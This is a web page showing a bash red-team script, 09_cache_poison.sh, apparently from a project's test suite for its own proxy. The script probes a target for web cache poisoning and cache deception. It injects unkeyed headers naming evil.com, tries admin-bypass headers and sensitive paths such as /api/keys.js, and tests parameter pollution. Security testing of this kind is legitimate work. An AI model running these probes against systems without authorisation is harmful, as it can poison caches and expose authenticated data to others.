AUTONOMY DIRECTORATE

๐Ÿ  Main

๐Ÿ  Home
โฐ Q-Day Countdown
0
Y
0
D
0
H
0
M
0
S
0
MS

๐Ÿงช Interactive Apps

๐Ÿ” Encrypt & Share ๐Ÿ”’ Encryption ๐Ÿ—œ๏ธ Compression ๐Ÿ“„ PDF Tools ๐ŸŽต Music โœจ Quantum Sandbox ๐Ÿ” Challenge Mode ๐Ÿ” Regex Designer ๐Ÿ—„๏ธ SQL Generator ๐Ÿ”ฌ PQC Scanner โšก HTTP/3 Scanner ๐Ÿš€ WebTransport Test ๐ŸŒ Speed Test ๐Ÿ“ก Telemetry Wall ๐ŸŽฒ Entropy

๐Ÿ“ฐ News

๐Ÿ“ฐ News
๐Ÿ—ž๏ธ Latest Headlines
Loading news...
Loading... โ€ข Just now

๐Ÿ›ก๏ธ PQ Crypta Proxy

๐ŸŒ Proxy Whitepaper ๐Ÿ–ฅ๏ธ Control Plane ๐Ÿ™ GitHub ๐ŸŽฏ Red Team Tests

๐Ÿ‘ค Account

๐Ÿ“ Sign Up ๐Ÿ”‘ Login ๐Ÿ“Š Dashboard ๐Ÿฉบ Health Monitor ๐Ÿ“ก System Telemetry ๐Ÿšช Logout

โŸจ QUANTUM ERROR PORTAL โŸฉ

Navigate the Error Dimensions

PQ Crypta Logo

Script Viewer

Red Team Suite › 09_cache_poison.sh

09_cache_poison.sh 44 lines
Download ← All Scripts
1 #!/bin/bash
2 # Web cache poisoning + cache deception
3 SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
4 source "$SCRIPT_DIR/../config.sh"
5 OUT="$OUT/cache_poison"
6 mkdir -p "$OUT"
7
8 echo '=== CACHE POISONING TESTS ===' | tee "$OUT/summary.txt"
9
10 # Unkeyed header injection
11 echo '--- Unkeyed Header Cache Poison ---' | tee -a "$OUT/summary.txt"
12 POISON_HEADERS=(
13 'X-Forwarded-Host: evil.com'
14 'X-Forwarded-Scheme: http'
15 'X-Forwarded-Proto: http'
16 'X-Original-URL: /admin'
17 'X-Rewrite-URL: /admin'
18 'X-Custom-IP-Authorization: 127.0.0.1'
19 )
20 for hdr in "${POISON_HEADERS[@]}"; do
21 resp=$(curl -sk -o "$OUT/poison_body.txt" -w '%{http_code}' --max-time 10 -H "$hdr" "$TARGET/")
22 body_check=$(grep -i 'evil.com\|127.0.0.1' "$OUT/poison_body.txt" 2>/dev/null | head -1)
23 echo "[$resp] $hdr | reflected: ${body_check:-none}" | tee -a "$OUT/summary.txt"
24 done
25
26 # Cache deception - append .css/.js to authenticated paths
27 echo '' | tee -a "$OUT/summary.txt"
28 echo '--- Cache Deception ---' | tee -a "$OUT/summary.txt"
29 DECEPTION_PATHS=('/admin/index.php/.css' '/api/keys.js' '/user/profile.png' '/account.css')
30 for p in "${DECEPTION_PATHS[@]}"; do
31 resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 "$TARGET$p")
32 echo "[$resp] $p" | tee -a "$OUT/summary.txt"
33 done
34
35 # Parameter pollution
36 echo '' | tee -a "$OUT/summary.txt"
37 echo '--- Parameter Pollution ---' | tee -a "$OUT/summary.txt"
38 resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 "$TARGET/?foo=bar&foo=baz")
39 echo "[$resp] Duplicate param ?foo=bar&foo=baz" | tee -a "$OUT/summary.txt"
40 resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 "$TARGET/?cb=$(date +%s)")
41 echo "[$resp] Cache buster param" | tee -a "$OUT/summary.txt"
42
43 cat "$OUT/summary.txt"
44